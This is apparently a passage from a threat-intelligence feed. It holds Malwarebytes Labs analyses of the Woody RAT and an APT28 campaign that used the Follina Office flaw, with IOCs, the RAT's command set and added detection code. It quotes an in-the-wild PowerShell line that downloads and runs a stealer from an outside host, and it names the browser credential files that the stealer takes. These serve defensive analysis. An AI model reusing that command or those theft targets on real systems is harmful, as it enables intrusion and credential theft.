zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/faq-mitigating-microsoft-offices-follina-zero-day/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": 
"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T16:36:44", "type": "malwarebytes", "title": "FAQ: Mitigating Microsoft Office\u2019s \u2018Follina\u2019 zero-day", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-01T16:36:44", "id": "MALWAREBYTES:6AC81D4001C847401760BE111E21585B", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/faq-mitigating-microsoft-offices-follina-zero-day/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T15:17:43", "description": "_This blog post was authored by Ankur Saini and Hossein Jazi_\n\nThe Malwarebytes Threat Intelligence team has identified a new Remote Access Trojan we are calling Woody Rat that has been in the wild for at least one year.\n\nThis advanced custom Rat is mainly the work of a threat actor that targets Russian entities by using lures in archive file format and more recently Office documents leveraging the Follina vulnerability.\n\nBased on a fake domain registered by the threat actors, we know that they tried to target a Russian aerospace and defense entity known as [OAK](<https://en.wikipedia.org/wiki/United_Aircraft_Corporation>).\n\nIn this blog post, we will analyze Woody Rat's distribution methods, capabilities as well as communication protocol.\n\n## Distribution methods \n\nBased on our knowledge, Woody Rat has been 
distributed using two different formats: archive files and Office documents using the Follina vulnerability.\n\nThe earliest versions of this Rat were typically archived into a zip file pretending to be a document specific to a Russian group. When the Follina vulnerability became known to the world, the threat actor switched to it to distribute the payload, as identified by [@MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1534184385313923072>).\n\nThe following diagram shows the overall attack flow used by the threat actor to drop Woody Rat:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure1.png> \"\" )Woody Rat distribution methods\n\n**Archive files**\n\nIn this method, Woody Rat is packaged into an archive file and sent to victims. We believe that these archive files have been distributed using spear phishing emails. Here are some examples of these archive files:\n\n * _anketa_brozhik.doc.zip_: It contains Woody Rat with the same name: _Anketa_Brozhik.doc.exe_.\n * _zayavka.zip_: It contains Woody Rat pretending to be an application form, named _application for participation in the selection.doc.exe_.\n\n**Follina vulnerability**\n\nThe threat actor is using a Microsoft Office document (_\u041f\u0430\u043c\u044f\u0442\u043a\u0430.docx_) that has been weaponized with the Follina (CVE-2022-30190) vulnerability to drop Woody Rat. The lure, written in Russian, is called "_Information security memo_" and provides security practices for passwords, confidential information, etc. 
\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure2.png> \"\" )Document lure\n\n## Woody Rat Analysis\n\nThe threat actor has left some debugging information including a pdb path from which we derived and picked a name for this new Rat:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure3.png> \"\" )Debug Information\n\nA lot of CRT functions seem to be statically linked, which leads to IDA generating a lot of noise and hindering analysis. Before initialization, the malware effectively suppresses all error reporting by calling SetErrorMode with 0x8007 as parameter.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure4.png> \"\" )main function\n\nAs we will see later, that malware uses multiple threads and so it allocates a global object and assigns a mutex to it to make sure no two clashing operations can take place at the same time. This object enforces that only one thread is reaching out to the C2 at a given time and that there are no pending requests before making another request. \n\n### Deriving the Cookie\n\nThe malware communicates with its C2 using HTTP requests. To uniquely identify each infected machine, the malware derives a cookie from machine specific values. The values are taken from the adapter information, computer name and volume information, and 8 random bytes are appended to this value to avoid any possible cookie collisions by the malware.\n\nA combination of _GetAdaptersInfo_, _GetComputerNameA_ and _GetVolumeInformationW_ functions are used to retrieve the required data to generate the cookie. This cookie is sent with every HTTP request that is made to the C2.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure5.png> \"\" )get_cookie_data function\n\n### Data encryption with HTTP requests\n\nTo evade network-based monitoring the malware uses a combination of RSA-4096 and AES-CBC to encrypt the data sent to the C2. 
The public key used for RSA-4096 is embedded inside the binary and the malware formulates the RSA public key blob at runtime using the embedded data and imports it using the _BCryptImportKeyPair_ function.\n\nThe malware derives the key for AES-CBC at runtime by generating 32 random bytes; these 32 bytes are then encrypted with RSA-4096 and sent to the C2. Both the malware and C2 simultaneously use these bytes to generate the AES-CBC key using _BCryptGenerateSymmetricKey_ which is used in subsequent HTTP requests to encrypt and decrypt the data. For encryption and decryption the malware uses _BCryptEncrypt_ and _BCryptDecrypt_ respectively.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure6.png> \"\" )RSA Encryption routine\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure7.png> \"\" )AES Encryption Routine\n\n### C2 HTTP endpoint request\n\n**knock** - This is the first HTTP request that the malware makes to the C2. The machine-specific cookie is sent as part of the headers here. This is a POST request and the data of this request contains 32 random bytes which are used to derive AES-CBC key, while the 32 bytes are RSA-4096 encrypted.\n\nThe data received as response for this request is decrypted and it contains the url path to submit (/submit) the additional machine information which the malware generates after this operation.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure8.png> \"\" )knock request headers\n\n**submit **- This endpoint request is used to submit information about the infected machine. The data sent to the C2 is AES-CBC encrypted. 
[Data](<https://gist.github.com/kernelm0de/fd018d58ebe78f603a13b2eba7f01917>) sent via submit API includes:\n\n * OS\n * Architecture\n * Antivirus installed\n * Computer Name\n * OS Build Version\n * .NET information\n * PowerShell information\n * Python information (Install path, version etc.)\n * Storage drives - includes Drive path, Internal name etc.\n * Environment Variables\n * Network Interfaces\n * Administrator privileges\n * List of running processes\n * Proxy information\n * Username\n * List of all the User accounts\n\nThe malware currently detects 6 AVs through Registry Keys; these AVs being Avast Software, Doctor Web, Kaspersky, AVG, ESET and Sophos.\n\n**ping** - The malware makes a ping GET http request to the C2 at regular intervals. If the C2 responds with "_CRY" then the malware proceeds to send the knock request again but if the C2 responds with "_ACK" the response contains additional information about which command should be executed by the malware.\n\nThe malware supports a wide variety of commands which are classified into _SET and _REQ requests as seen while analyzing the malware. We will dive into all these commands below in the blog.\n\n### C2 Commands\n\nThe malware uses a specific thread to communicate with the C2 and a different one to execute the commands received from the C2. To synchronize between both threads, the malware leverages events and mutex. To dispatch a command it modifies the state of the event linked to that object. 
We should note that all the communications involved in these commands are AES encrypted.

[Figure: Command execution routine](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure9.png>)

**_SET Commands**

 * **PING** - Sets the sleep interval between every ping request to the C2.
 * **PURG** - Unknown command.
 * **EXIT** - Exits the command execution thread.

**_REQ Commands**

 * **EXEC** (Execute) - Executes the command received from the C2 by creating a cmd.exe process. The malware creates two named pipes and redirects the process's input and output to them. The output of the command is read from the named pipe using _ReadFile_, "_DAT" is appended to the data, and the result is AES encrypted and sent to the C2.

[Figure: EXEC command](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure10.png>)

 * **UPLD** (Upload) - Remotely uploads a file to the infected machine. The malware makes a GET request to the C2 and receives the data to be written to a file.
 * **INFO** (Submit Information) - Similar to the "submit" request above; this command sends exactly the information to the C2 that the "submit" request sends.

Figure: INFO command

 * **UPEX** (Upload and Execute) - A combination of the UPLD and EXEC commands. The command first writes a file received from the C2 and then executes that file.
 * **DNLD** (Download) - Allows the C2 to retrieve any file from the infected machine. The malware encrypts the requested file and sends the data via a POST request to the C2.
 * **PROC** (Execute Process) - Similar to the EXEC command with a slight difference: the process is executed directly instead of through cmd.exe as in EXEC. The command uses named pipes in the same way as EXEC.
 * **UPPR** (Upload and Execute Process) - A combination of the UPLD and PROC commands.
The command receives the remote file using the upload command, then executes the file using the PROC command.
 * **SDEL** (Delete File) - Deletes any file on the infected system. It also seems to overwrite the first few bytes of the file to be deleted with random data.
 * **_DIR** (List directory) - Lists all the files and their attributes in a directory supplied as argument. If no directory is supplied, it lists the current directory. File attributes retrieved by this command are:
   * Filename
   * Type (Directory, Unknown, File)
   * Owner
   * Creation time
   * Last access time
   * Last write time
   * Size
   * Permissions
 * **STCK** (Command Stack) - Allows the attacker to execute multiple commands with one request. The malware can receive a STCK command with multiple child commands, which are executed in the order they are received.
 * **SCRN** (Screenshot) - Uses Windows GDI+ to take a screenshot of the desktop. The image is then encrypted using AES-CBC and sent to the C2.
 * **INJC** (Process Injection) - The malware seems to generate a new AES key for this command. The code to be injected is received from the C2 and decrypted. To inject the code into the target process, it writes it to the remote process's memory using WriteProcessMemory and then creates a remote thread using CreateRemoteThread.

[Figure: INJC routine](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure12.png>)

 * **PSLS** (Process List) - Calls _NtQuerySystemInformation_ with _SystemProcessInformation_ to retrieve an array of all the running processes. Information sent to the C2 about each process:
   * PID
   * Parent PID
   * Image name
   * Owner
 * **DMON** (Creates Process) - Similar to PROC, the only difference being that the output of the process is not sent back to the C2.
It receives the process name from the C2 and executes it using CreateProcess.
 * **UPDM** (Upload and Create Process) - Allows the C2 to upload a file and then execute it using the DMON command.

**SharpExecutor and PowerSession Commands**

Interestingly, the malware has 2 .NET DLLs embedded inside, named _WoodySharpExecutor_ and _WoodyPowerSession_ respectively. _WoodySharpExecutor_ gives the malware the ability to run .NET code received from the C2. _WoodyPowerSession_ allows the malware to execute PowerShell commands and scripts received from the C2.

_WoodyPowerSession_ uses pipelines to execute these PowerShell commands. The .NET DLLs are loaded by the malware, and commands are executed via the methods present in these DLLs:

[Figure: SharpExecutor and PowerSession methods](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure13.png>)

We look at the commands utilising these DLLs below:

 * **DN_B** (DotNet Binary) - Uses the RunBinaryStdout method to execute .NET assembly code with arguments received from the C2. The code is received as an array of Base64 strings separated by the 0x20 (space) character.
 * **DN_D** (DotNet DLL) - Gives the attacker much more control over the execution. The attacker can choose whether or not to send the console output back to the C2. The method receives an array of Base64 strings consisting of code, class name, method name and arguments.
The DLL loads the code, then finds and executes the method based on the other arguments received from the C2.
 * **PSSC** (PowerSession Shell Command) - Allows the malware to receive a Base64 encoded PowerShell command and execute it.
 * **PSSS** (PowerSession Shell Script) - Allows the malware to load and execute a Base64 encoded PowerShell script received from the C2.
 * **PSSM** (PowerSession Shell Module) - Receives an array of Base64 encoded strings, one containing the module contents and the other the module name. The strings are decoded, and the module is imported into the command pipeline and then invoked.

### Malware Cleanup

After creating the command threads, the malware deletes itself from disk. It uses the well-known _ProcessHollowing_ technique to do so: it creates a suspended notepad process and writes shellcode that deletes a file into the suspended process using _NtWriteVirtualMemory_. The entry point of the thread is set using _NtSetContextThread_ and the thread is then resumed, which deletes the malware from disk.

[Figure: Malware deletes itself](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure14.png>)

## Unknown threat actor

This very capable RAT falls into the category of unknown threat actors we track. Historically, Chinese APTs such as Tonto Team as well as North Korea with Konni have targeted Russia. However, based on what we were able to collect, there weren't any solid indicators to attribute this campaign to a specific threat actor.

Malwarebytes blocks the Follina exploit that is being leveraged in the latest Woody RAT campaign.
We also already detected the binary payloads via our heuristic malware engines.

## IOCs

**Woody Rat**:

 * 982ec24b5599373b65d7fec3b7b66e6afff4872847791cf3c5688f47bfcb8bf0
 * 66378c18e9da070629a2dbbf39e5277e539e043b2b912cc3fed0209c48215d0b
 * b65bc098b475996eaabbb02bb5fee19a18c6ff2eee0062353aff696356e73b7a
 * 43b15071268f757027cf27dd94675fdd8e771cdcd77df6d2530cb8e218acc2ce
 * 408f314b0a76a0d41c99db0cb957d10ea8367700c757b0160ea925d6d7b5dd8e
 * 0588c52582aad248cf0c43aa44a33980e3485f0621dba30445d8da45bba4f834
 * 5c5020ee0f7a5b78a6da74a3f58710cba62f727959f8ece795b0f47828e33e80
 * 3ba32825177d7c2aac957ff1fc5e78b64279aeb748790bc90634e792541de8d3
 * 9bc071fb6a1d9e72c50aec88b4317c3eb7c0f5ff5906b00aa00d9e720cbc828d

**C2s:**

 * kurmakata.duckdns[.]org
 * microsoft-ru-data[.]ru
 * 194.36.189.179
 * microsoft-telemetry[.]ru
 * oakrussia[.]ru

**Follina Doc:**

 * Памятка.docx
 * ffa22c40ac69750b229654c54919a480b33bc41f68c128f5e3b5967d442728fb

**Follina html file:**

 * garmandesar.duckdns[.]org:444/uoqiuwef.html

**Woody Rat url:**

 * fcloud.nciinform[.]ru/main.css

The post [Woody RAT: A new feature-rich malware spotted in the wild](<https://blog.malwarebytes.com/threat-intelligence/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).

Published: 2022-08-03 (related CVE: CVE-2022-30190)
**Russia's APT28 uses fear of nuclear war to spread Follina docs in Ukraine** (Malwarebytes Labs, published 2022-06-21)

_This blog post was authored by Hossein Jazi and Roberto Santos_.

In a recent campaign, APT28, an advanced persistent threat actor linked with Russian intelligence, set its sights on Ukraine, targeting users with malware that steals credentials stored in browsers.

APT28 (also known as Sofacy and Fancy Bear) is a notorious Russian threat actor that has been active since at least 2004, with its main activity being collecting intelligence for the Russian government.
The group is known to have targeted US politicians and [US organizations](<https://blog.malwarebytes.com/reports/2021/07/beware-password-spraying-fancy-bears/>), including US nuclear facilities.

On June 20, 2022, Malwarebytes Threat Intelligence [identified](<https://twitter.com/h2jazi/status/1538957205210337280>) a document that had been weaponized with the [Follina](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/microsoft-office-zero-day-follina-its-not-a-bug-its-a-feature-its-a-bug/>) (CVE-2022-30190) exploit to download and execute a new .NET stealer first reported by [Google](<https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe/>). The discovery was also made [independently by CERT-UA](<https://cert.gov.ua/article/341128>).

Follina is a recently discovered zero-day exploit that uses the `ms-msdt` protocol to load malicious code from Word documents when they are opened. This is the first time we've observed APT28 using Follina in its operations.

## The malicious document

The maldoc's filename, `Nuclear Terrorism A Very Real Threat.rtf`, attempts to get victims to open it by preying on their fears that the invasion of Ukraine will escalate into a nuclear conflict.

The content of the document is an article from the [Atlantic Council](<https://www.atlanticcouncil.org/blogs/new-atlanticist/will-putin-use-nuclear-weapons-in-ukraine-our-experts-answer-three-burning-questions/>) called "_Will Putin use nuclear weapons in Ukraine? Our experts answer three burning questions_" published on May 10 this year.

The lure asks "Will Putin use nuclear weapons in Ukraine?"

The maldoc is a docx file (pretending to be an RTF file) compiled on June 10, which suggests that the attack was used around the same time.
It uses a remote template embedded in the `Document.xml.rels` file to retrieve a remote HTML file from the URL [http://kitten-268.frge.io/article.html](<https://www.virustotal.com/gui/url/9863b9b4ae9c555cd4dc30803000ea202f642a37321da2222fec9d51bce443b1>).

[Figure: The malicious HTML document](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/malicious-html-document.png>)

The HTML file uses a JavaScript assignment to `window.location.href` to load and execute an encoded PowerShell script using the `ms-msdt` MSProtocol URI scheme. The decoded script uses `cmd` to run PowerShell code that downloads and executes the final payload:

    "C:\WINDOWS\system32\cmd.exe" /k powershell -NonInteractive -WindowStyle Hidden -NoProfile -command "& {iwr http://kompartpomiar.pl/grafika/SQLite.Interop.dll -OutFile "C:\Users\$ENV:UserName\SQLite.Interop.dll";iwr http://kompartpomiar.pl/grafika/docx.exe -OutFile "C:\Users\$ENV:UserName\docx.exe";Start-Process "C:\Users\$ENV:UserName\docx.exe"}"

## Payload Analysis

The final payload is a variant of a stealer APT28 has [used against targets in Ukraine](<https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe/>) before. In the oldest variant, the stealer used a fake error message to hide what it was doing (a secondary thread displayed the error message while the main program continued executing). The new variant does not show the popup.
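The remote-template hook described above is visible inside the document itself before anything is fetched: an OOXML relationship with `TargetMode="External"` whose target is an http(s) URL, and, once the HTML is retrieved, an `ms-msdt:` URI in its body. The following triage check is an added example written for this page by the editor, not code from Malwarebytes or from the analysed sample. It walks every `.rels` part of a package so a template wired through either `document.xml.rels` or `settings.xml.rels` is caught; the package and the HTML fragment it scans are constructed in memory for the demonstration, and `example.invalid` is a placeholder host, not an indicator from the post.

```python
"""Triage check for Office files that pull a remote template (Follina-style).

Added example, not code from Malwarebytes or from the analysed sample. It
unpacks an OOXML package in memory, reports every relationship whose
TargetMode is "External" and whose Target is an http(s) URL, and offers a
second check for an ms-msdt: URI in a fetched HTML body. The package and
HTML below are constructed for the demo; example.invalid is a placeholder.
"""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
MSDT_RE = re.compile(r"ms-msdt\s*:", re.IGNORECASE)
HTTP_RE = re.compile(r"https?://", re.IGNORECASE)


def external_relationships(docx_bytes):
    """Return (part, relationship type, target) for each remote http(s) target.

    Every *.rels part in the package is inspected, so a remote template wired
    through settings.xml.rels is caught as well as one in document.xml.rels.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and HTTP_RE.match(target):
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    hits.append((name, rel_type, target))
    return hits


def contains_msdt_uri(text):
    """True if a blob (e.g. the HTML the template fetches) carries an ms-msdt: URI."""
    return MSDT_RE.search(text) is not None


def build_sample_docx(template_url):
    """Construct a minimal package whose settings part points at a template."""
    rels = (
        f'<Relationships xmlns="{RELS_NS}">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
        'officeDocument/2006/relationships/attachedTemplate" '
        f'Target="{template_url}" TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    doc = build_sample_docx("http://example.invalid/article.html")  # constructed
    for part, rel_type, target in external_relationships(doc):
        print(f"remote {rel_type} in {part}: {target}")
    # Constructed stand-in for the fetched HTML; only the URI scheme matters here.
    html = '<script>window.location.href = "ms-msdt:PLACEHOLDER";</script>'
    print("ms-msdt URI present:", contains_msdt_uri(html))
```

A relationship with an external http(s) target is not malicious on its own (corporate templates on intranet servers exist), so the output is a triage signal to pair with the URL's reputation and with the second check on the fetched content, not a verdict.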

Figure: In older versions of the stealer, a fake error message distracted users

The variant used in this attack is almost identical to the one reported by Google, with just a few minor refactors and some additional sleep commands.

[Figure: A side-by-side comparison of two versions of the APT28 stealer](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/comparing-version-one-and-version-two-of-the-malicious-stealer.png>)

As with the previous variant, the stealer's main purpose is to steal data from several popular browsers.

### Google Chrome and Microsoft Edge

The malware steals any website credentials (username, password and URL) users have saved in the browser by reading the contents of `%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data`.

[Figure: Debugging session showing how attackers are capable of stealing credentials](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/debugging-session-1.png>)

In a very similar way, the new variant also grabs all the saved cookies stored in Google Chrome by accessing `%LOCALAPPDATA%\Google\Chrome\User Data\Default\Network\Cookies`.

[Figure: Cookie stealing code (Google Chrome)](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/cookie-stealing.png>)

Stolen cookies can sometimes be used to break into websites even if the username and password aren't saved in the browser.

The code to steal cookies and passwords from the Chromium-based Edge browser is almost identical to the code used for Chrome.

### Firefox

This malware can also steal data from Firefox.
It does this by iterating through every profile looking for the `cookies.sqlite` file that stores each user's cookies.

[Figure: Sysmon capturing access to the cookies.sqlite file](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/cookie-stealing-firefox.png>)

For passwords, the attackers attempt to steal `logins.json`, `key3.db`, `key4.db`, `cert8.db`, `cert9.db` and `signons.sqlite`.

Figure: Attackers also grab passwords from Firefox

These files are necessary for recovering elements like saved passwords and certificates. Old versions are also supported (`signons.sqlite`, `key3.db` and `cert8.db` are no longer used by new Firefox versions). Note that if the user has set a master password, the attackers will likely attempt to crack it offline later to recover these credentials.

## Exfiltrating data

The malware uses the IMAP email protocol to exfiltrate data to its command and control (C2) server.

[Figure: The IMAP login event](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/imap-login-event.png>)

The old variant of this stealer connected to mail[.]sartoc.com (144.208.77.68) to exfiltrate data. The new variant uses the same method but a different domain, www.specialityllc[.]com. Interestingly, both are located in Dubai.

It's likely the owners of the C2 websites have nothing to do with APT28, and the group simply took advantage of abandoned or vulnerable sites.

Although ransacking browsers might look like petty theft, passwords are the key to accessing sensitive information and intelligence. The target, and the involvement of APT28 (a division of Russian military intelligence), suggest that the campaign is part of the conflict in Ukraine, or at the very least linked to the foreign policy and military objectives of the Russian state.
Ukraine continues to be a battleground for cyberattacks and espionage, as well as devastating kinetic warfare and humanitarian abuses.

For more coverage of threat actors active in the Ukraine conflict, read our recent article about the efforts of an unknown APT group that has [targeted Russia repeatedly since Ukraine invasion](<https://blog.malwarebytes.com/threat-intelligence/2022/05/unknown-apt-group-has-targeted-russia-repeatedly-since-ukraine-invasion/>).

## Protection

Malwarebytes customers were proactively protected against this campaign thanks to our anti-exploit protection.

## IOCs

**Maldoc:**

 * Nuclear Terrorism A Very Real Threat.rtf
 * daaa271cee97853bf4e235b55cb34c1f03ea6f8d3c958f86728d41f418b0bf01

**Remote template (Follina):**

 * http://kitten-268.frge[.]io/article.html

**Stealer:**

 * http://kompartpomiar[.]pl/grafika/docx.exe
 * 2318ae5d7c23bf186b88abecf892e23ce199381b22c8eb216ad1616ee8877933

**C2:**

 * www.specialityllc[.]com

The post [Russia's APT28 uses fear of nuclear war to spread Follina docs in Ukraine](<https://blog.malwarebytes.com/threat-intelligence/2022/06/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).

Published: 2022-06-21 (related CVE: CVE-2022-30190)
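The browser artifact paths named in the APT28 post above (Chrome/Edge `Login Data` and `Cookies`, Firefox `cookies.sqlite`, `logins.json`, `key3.db`, `key4.db`, `cert8.db`, `cert9.db`, `signons.sqlite`) are a natural detection anchor: the browser is the only process that should be opening its own credential stores. The rule below is an added example written for this page by the editor, not Malwarebytes code. It assumes a telemetry source that records which process image opened which file (Sysmon on its own does not log file reads, so an EDR-style file-access feed is assumed), and the event lines are constructed for the demonstration in a simple pipe-separated layout of the example's own; the stealer image name `docx.exe` is the one the post reports.

```python
"""Allow-list rule for processes reading browser credential stores.

Added example, not Malwarebytes code. It encodes the artifact file names the
post lists and flags any file event in which a process other than the
browser itself opens one of them. The event lines are constructed for the
demo in a "timestamp|image|target" layout of this example's own; a real
deployment would map its EDR/file-access telemetry onto the same fields.
"""
from pathlib import PureWindowsPath

CHROMIUM_STORES = {"login data", "cookies"}
FIREFOX_STORES = {"cookies.sqlite", "logins.json", "key3.db", "key4.db",
                  "cert8.db", "cert9.db", "signons.sqlite"}
# Images that legitimately open their own stores; anything else is an alert.
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe"}

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = r"""
2022-06-20T10:00:01Z|C:\Program Files\Google\Chrome\Application\chrome.exe|C:\Users\a\AppData\Local\Google\Chrome\User Data\Default\Login Data
2022-06-20T10:00:02Z|C:\Users\a\docx.exe|C:\Users\a\AppData\Local\Google\Chrome\User Data\Default\Login Data
2022-06-20T10:00:03Z|C:\Users\a\docx.exe|C:\Users\a\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
2022-06-20T10:00:04Z|C:\Users\a\docx.exe|C:\Users\a\AppData\Roaming\Mozilla\Firefox\Profiles\x1.default\key4.db
2022-06-20T10:00:05Z|C:\Program Files\Mozilla Firefox\firefox.exe|C:\Users\a\AppData\Roaming\Mozilla\Firefox\Profiles\x1.default\cookies.sqlite
2022-06-20T10:00:06Z|C:\Users\a\docx.exe|C:\Users\a\Documents\notes.txt
"""


def classify_store(target):
    """Return "chromium", "firefox" or None for a target file path.

    The parent-directory check ("User Data" / "Firefox") keeps an unrelated
    file that merely shares a name (e.g. a stray Cookies file) from alerting.
    """
    path = PureWindowsPath(target)
    name = path.name.lower()
    parts = {p.lower() for p in path.parts}
    if name in CHROMIUM_STORES and "user data" in parts:
        return "chromium"
    if name in FIREFOX_STORES and "firefox" in parts:
        return "firefox"
    return None


def detect(events):
    """Return (timestamp, image name, store family, file name) per violation."""
    alerts = []
    for line in events.strip().splitlines():
        try:
            ts, image, target = line.split("|", 2)
        except ValueError:
            continue  # malformed line; a real pipeline would count these
        store = classify_store(target)
        if store is None:
            continue
        image_name = PureWindowsPath(image).name.lower()
        if image_name not in BROWSER_IMAGES:
            alerts.append((ts, image_name, store, PureWindowsPath(target).name))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print("ALERT", *alert)
```

Backup agents and password managers also read these stores, so in production the allow-list grows per environment; matching on the image name alone is also spoofable, and a signed-path or hash match on the image is the stronger form of the same rule.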
"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-21T15:25:09", "id": "MALWAREBYTES:69B09CC9DBBA58546698D97B0C4BAAF0", "href": "https://blog.malwarebytes.com/threat-intelligence/2022/06/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-02T17:32:49", "description": "_**Update: Please see our [FAQ](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/faq-mitigating-microsoft-offices-follina-zero-day/>) for the latest guidance and mitigation tips on Follina.**_\n\nOn Monday May 30, 2022, Microsoft issued [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) regarding the Microsoft Support Diagnostic Tool (MSDT) in Windows vulnerability.\n\nThe [mitigation](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) offered by Microsoft consists of an alternative method to unregister the MSDT URL Protocol. \nSeveral researchers have come across a novel attack that circumvents Microsoft's Protected View and anti-malware detection.\n\nThe attack vector uses the Word remote template feature to retrieve an HTML file from a remote webserver. 
It goes on to use the `ms-msdt` protocol URI scheme to load some code, and then execute some PowerShell.

All of the above methods are features, but if we tell you that put together they allow an attacker to remotely run code on your system by tricking you into clicking a link, that sounds quite disturbing, doesn't it?

Well, you'd be right to be concerned. That little sequence of features adds up to a zero-day flaw in Microsoft Office that is being abused in the wild to achieve arbitrary code execution on Windows systems.

Jerome Segura, Malwarebytes' Senior Director, Threat Intelligence:

> This elegant attack is designed to bypass security products and fly under the radar by leveraging Microsoft Office's remote template feature and the ms-msdt protocol to execute malicious code, all without the need for macros.

The most prominent researchers working on the issue have dubbed the vulnerability in Microsoft Office **Follina**, because a sample uploaded to VirusTotal included the area code for the Italian comune Follina.

The first researcher to find and report Follina used in the wild goes by the handle [@CrazymanArmy](<https://twitter.com/CrazymanArmy/status/1531120929321152512?s=20&t=-Qqi0GkIHnH0kN46y8DL1w>). Our own analyst Hossein Jazi had also spotted the same maldoc, although at the time the remote template was down, leaving out a critical piece of the attack chain.

> Our threat intel analyst [@h2jazi](<https://twitter.com/h2jazi?ref_src=twsrc%5Etfw>) had spotted a sample using the msdt.exe RCE back in April.
>
> At the time, the remote template was already down and therefore full identification was not possible.
> <https://t.co/03UU2ClMhv>
>
> -- Malwarebytes Threat Intelligence (@MBThreatIntel) [May 30, 2022](<https://twitter.com/MBThreatIntel/status/1531398009103142912?ref_src=twsrc%5Etfw>)

It was more recently made public again by [@nao_sec](<https://twitter.com/nao_sec/status/1530196847679401984?s=20&t=-Qqi0GkIHnH0kN46y8DL1w>).

> Interesting maldoc was submitted from Belarus. It uses Word's external link to load the HTML and then uses the "ms-msdt" scheme to execute PowerShell code. <https://t.co/hTdAfHOUx3> [pic.twitter.com/rVSb02ZTwt](<https://t.co/rVSb02ZTwt>)
>
> -- nao_sec (@nao_sec) [May 27, 2022](<https://twitter.com/nao_sec/status/1530196847679401984?ref_src=twsrc%5Etfw>)

## Affected versions

